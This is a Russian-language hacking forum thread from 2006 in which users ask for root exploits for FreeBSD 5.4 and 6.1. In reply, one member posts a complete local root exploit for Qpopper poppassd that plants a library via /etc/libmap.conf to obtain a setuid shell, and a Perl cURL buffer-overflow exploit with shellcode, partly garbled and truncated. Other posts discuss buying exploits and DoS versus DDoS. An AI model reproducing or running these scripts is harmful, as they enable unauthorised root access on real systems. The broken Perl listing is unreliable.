PDA

Просмотр полной версии : У кого есть рут сплойт под фряху?


SanyaX
31.08.2006, 16:40
Вот собственно под эту версию FreeBSD 5.4-RELEASE сплойт нужен. В инете обыскал не где не нашёл. У кого есть поделитесь :).

Dracula4ever
31.08.2006, 16:49
вот тебе хорошый сплойт для FreeBSD 5.4-RELEASE


#!/bin/sh
################################################## #########################
# FreeBSD Qpopper poppassd latest version local r00t exploit by kcope ###
# tested on FreeBSD 5.4-RELEASE ###
################################################## #########################

POPPASSD_PATH=/usr/local/bin/poppassd
HOOKLIB=libutil.so.4

echo ""
echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
echo ""
sleep 2
umask 0000
if [ -f /etc/libmap.conf ]; then
echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
exit
fi
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
if (!geteuid()) {
remove("/etc/libmap.conf");
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
}
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "--- Now type ENTER ---"
echo ""
$POPPASSD_PATH -t /etc/libmap.conf
echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
su
if [ -f /tmp/xxxx ]; then
echo "IT'S A ROOTSHELL!!!"
/tmp/xxxx
else
echo "Sorry, exploit failed."
fi

SanyaX
31.08.2006, 16:55
Не не подходит ошибки выдаёт :(.
/usr/local/bin/poppassd: not found
cannot create /etc/libmap.conf: Permission denied

Dracula4ever
31.08.2006, 17:01
SanyaX вот посмотри http://www.milw0rm.com/exploits/1230

+toxa+
31.08.2006, 17:27
ну эт только если Qpopper установлен...

[loy]
19.09.2006, 05:39
А вот мне нужен Сплоед под FreeBSD 6.1

[hidden]
19.09.2006, 05:55
Под шестую ветку есть только парочка DoS-эксплойтов, которые уже не работают

Dracula4ever
19.09.2006, 09:40
']А вот мне нужен Сплоед под FreeBSD 6.1


#!/usr/bin/perl
#
# Remote FreeBSD cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com)
#
# This exploit may only be used for testing purposes. More information
# about the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write "Ha! Owned by a cURL!" to stdout on the system
# running cURL. The extra nops are needed because the buffer, which causes
# the overflow, is altered.
#
# $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/
# Ha! Owned by a cURL!

use IO::Socket;
use Net::hostent;

################################################## ######################

$shellcode =
"xebx14x5ex31xc0x6ax14x56x40x40x50xb0x04x50xcd".
"x80x31xc0x40x50xcdx80xe8xe7xffxffxffx48x61x21".
"x20x4fx77x6ex65x64x20x62x79x20x61x20x63x55x52".
"x4cx21x23".

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";

while($_ = $ARGV[0], /^-/) {
shift;
last if /^--$/;
/^-p/ && do { $port = shift; };
/^-l/ && do { $list = 1; };
/^-o/ && do { $offset = shift; };
}


$id = `id -u`; chop($id);
$size = 225;
$esp = 0xbfbffbd4;
$offset = -140 unless $offset;
$port = 21 unless $port;

if(!$list || $port > 1024 && $id != 0) {

print
Option: $0 -o

Note: low ports require root privileges

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+

TWENTE
exit;

}

for ($i = 0; $i $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!n" unless $sock;

while($cl = $sock->accept()) {

$hostinfo = gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]n", $cl->peerhost;
print $cl "220 Safemode.org FTP server (Version 666) ready.n";
print $cl "230 Okn";
print $cl "227 $buffern";
sleep 2;

}

blackybr
19.09.2006, 10:58
dracula4ever читай описание сплоита в шапке.. вроде инглиш же знаешь

SanyaX
19.09.2006, 11:01
Смешно этот сплойт воще не под рут идёт. Имхо я заметил под фряху воще в паблике сплойтов нету.

[hidden]
19.09.2006, 11:19
Ну, по сути можно разгрести шеллкод и переделать=) Мдя..

blackybr
19.09.2006, 12:08
так и не нашел.. в паблике точно нет

Odissei
18.10.2006, 17:28
Вот собственно под эту версию FreeBSD 5.4-RELEASE сплойт нужен. В инете обыскал не где не нашёл. У кого есть поделитесь .
SanyaX а ты нашел спойт под эту версию? если нашел поделись плиз...а то весь гугль обыскал ничего не нашел...или в правду под фряху нефига нету сплоитов (в паблике)?....

naqnaq
22.10.2006, 04:51
Все правильно! == в паблике нет local root kernel эксплойтов для FreeBsd => 5.4. Последний master.passwd disclosure exploit (dump in kmem)

Scipio
29.12.2006, 14:46
А я бы купил

fucker"ok
29.12.2006, 15:08
>А я бы купил
за сто рублей ?

T0p
29.12.2006, 16:47
Сплоитов под саму фряху и так не много... уточнять надо локальный удаленый..
нужно под демоны разве что смотреть..

KPOT_f!nd
30.12.2006, 12:25
Под шестую ветку есть только парочка DoS-эксплойтов, которые уже не работают
При чем здесь ДДОС? С ДДОСА ты не поднимешь рута!

aka PSIH
30.12.2006, 17:02
При чем здесь ДДОС? С ДДОСА ты не поднимешь рута!
DoS и DDos вроде как разные вещи...

zl0ba
31.12.2006, 00:42
DDoS - Distributed Denial of Service = распределенная атака отказа в обслуживании. Это еще более разрушительная атака чем просто DoS.

aka PSIH
31.12.2006, 08:25
я так не считаю... поясню почему есть два вида атак DDoS и DoS, так вот простой отказ в обслуживании (DoS - Denial of Service), да - должен строится на уязвимостях софта и железа, но именно связи с этим он кратковременен и неэффективен, софт пропатчат, железо проапгрейтят... а вот DDoS - Distributed DoS - не должен быть привязан к конкретному софту или железу, это так сказать "последнее слово"... он в силу многочисленности ботов воздействует на физические ресурсы (канал, вычислительные мощности и т.д.) и атакующий должен быть в нем уверен, как в ядерной бомбе... потому, что кроме как вывести хост на максимальное время из строя других целей нет, и это должно осуществляться независимо от железа или софта, например:
ах у нас маршрутизатор фильтрует пакеты идущие к Апачу на Линуксе, на фик тогда - еще X ботов подключим и забьем маршрутизатор, чтоб не успевал все фильтровать... и так далее...
конечно, это идеальная схема, но цель именно такова...

(c)xakepy.ru

KPOT_f!nd
31.12.2006, 13:41
DoS и DDos вроде как разные вещи...
Читай нормально ДДОС и DOS.

zl0ba
02.01.2007, 12:11
Да блин, идея у них одна =/